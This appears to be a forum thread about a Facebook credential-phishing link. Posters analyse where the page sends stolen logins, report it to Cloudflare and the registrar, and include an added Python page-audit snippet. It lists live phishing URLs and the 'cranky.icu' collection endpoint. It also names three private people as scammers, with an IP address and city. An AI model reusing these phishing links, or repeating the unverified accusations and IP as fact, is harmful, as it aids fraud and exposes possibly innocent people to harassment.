Password stealing

The other day I was enjoying myself and I was texted with an interesting link that led to a “Facebook login” which they use to steal your login info to get into your account. I gave them some bait and let them access my Facebook, but changed the password right after getting their IP address. The link they sent had a caption attached that said:

Wow i can’t belive it💔

https://6ta.eu/0qCOS

There are 3 known individuals that are involved with this scam and they are

Phaidra Weaver (Ecchiwolf)

Jahmir Williams

and their leader Damien Garcia-nakata Akira

which are all friends and work together. I wouldn’t doubt that there are more than the 3 of them, but these 3 are the most active with stealing people’s personal information.

Earlier I mentioned an IP address.

That IP is 104.172.93.249, and they are located in San Bernardino, CA, United States. That’s all the information I have at this time. I really hope someone can do something with all of this because I’ve been harassed by these people for months and police won’t do anything about it. I don’t know where to go besides here.

Hmm so they’re collecting FB logins and passwords? Probably so they can use the info to impersonate people to scam others that may know the people they’re impersonating. Try reaching out to Jim Browning on YouTube, if you can reach him, he might be able to help.

Taking their website out now! thanks for the report.

Info I got on Ecchiwolf: ecchiwolf Username | Find ecchiwolf or Search for Availability

https://6ta.eu/0qCOS Has been reported.

Here’s what I’ve got (you guys probably found most of this already):

tldr; Goes through Cloudflare, I reported it to them. Form data sent to `cranky.icu` which I can't find anything about and has a suspicious `ip` parameter that I think is some kind of a red herring, but I'm not totally sure what's going on with it.

Their website is being served over Cloudflare.

Cloudflare isn't hosting the website, though; they are just hosting a reverse proxy that connects to the actual website. <bad-analogy>If the website is a house, a reverse proxy is like a road to the house that your request travels on.</bad-analogy> Reporting this to Cloudflare won't get rid of the underlying website, but it will mean that (temporarily) nobody will be able to access it (almost certainly). Their abuse form says:

“Cloudflare does not tolerate the distribution of malware or serving phishing content through the service. Legitimate reports of phishing and malware URLs will be promptly acted upon.”

You didn't mention it, so I'm assuming that you haven't reported it to Cloudflare yet, so I did it just now.

When you enter your login data, it packages it up and sends it to this URL:
-> `https://cranky.icu/login?name=daniel&ip=45.154.255.75`

The IP parameter changes, but seems to always be in Sweden (under different ISPs).

At first, I thought `cranky.icu` (195.133.192.86, different services disagree on location) was one of the many ad trackers placed on the site, but just going to `cranky.icu` yields 403 Forbidden. I checked, and `cranky.icu` is not hosted on Cloudflare, all I could find was that it is just someone running an Apache server on Debian.

One more thing, I just reported them to the Firefox phishing protection service and their domain registrar (OpenProvider) for both `6ta.eu` and `cranky.icu` too. They tried to make `6ta.eu` look like a URL shortener to make it seem like they weren’t responsible, but the homepage is just an iframe displaying the contents of `https://shorturl.at/`
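An added example, not part of any post in this thread: one way to repeat the checks described above on a saved copy of a suspicious page, listing every form action and iframe source that points at a host other than the page's own. The HTML below is constructed for illustration (the real page's markup is not shown in the thread), and the names `SubmitTargetAudit` and `audit` are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, parse_qs

# Constructed sample, modelled on what the thread reports: a landing page
# that frames another site and submits form data to a third-party host.
SAMPLE_PAGE_URL = "https://6ta.eu/0qCOS"
SAMPLE_HTML = """
<html><body>
<iframe src="https://shorturl.at/" width="100%" height="100%"></iframe>
<form method="post" action="https://cranky.icu/login?name=daniel&amp;ip=45.154.255.75">
  <input name="email"><input name="pass" type="password">
</form>
<form action="/search"><input name="q"></form>
</body></html>
"""

class SubmitTargetAudit(HTMLParser):
    """Collect form/iframe targets whose host differs from the page host."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        raw = {"form": attr.get("action"), "iframe": attr.get("src")}.get(tag)
        if not raw:
            return
        # Resolve relative targets against the page URL before comparing hosts.
        target = urlsplit(urljoin(self.page_url, raw))
        if target.hostname and target.hostname != self.page_host:
            self.findings.append({
                "tag": tag,
                "host": target.hostname,
                "path": target.path,
                "params": sorted(parse_qs(target.query)),  # names only
            })

def audit(page_url, html):
    parser = SubmitTargetAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Each finding gives a separate host to look up and report, which is why the post above files reports for both domains rather than only the one in the link.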

@Scambait_Sluth#189045 welcome in :smile:

https://6ta.eu/0qCOS no longer works

You guys are great and hopefully many others will join with you to help keep up the good work.

Anyhow, it appears these losers are still at it, because I received a private Facebook message yesterday from a friend whose account has apparently been compromised by them. I tried to post a screenshot but I couldn't figure out how to do it, so if it's possible to do then I'll need some assistance.

This is the link address from the message:

https://6ta.eu/UgIFYSMN4w

@YettiBlake#189854 Facebook phishing

![image polish-20210426-111254876png.png](https://tlscommunity.com/assets/2021-04-26/10:15:180-polish-20210426-111254876png.png)
For next time, you can use an image hosting service such as Imgur to link screenshots. Can embed them as well by doing:

``` [IMG]https://example.com/image.png[/IMG] ```
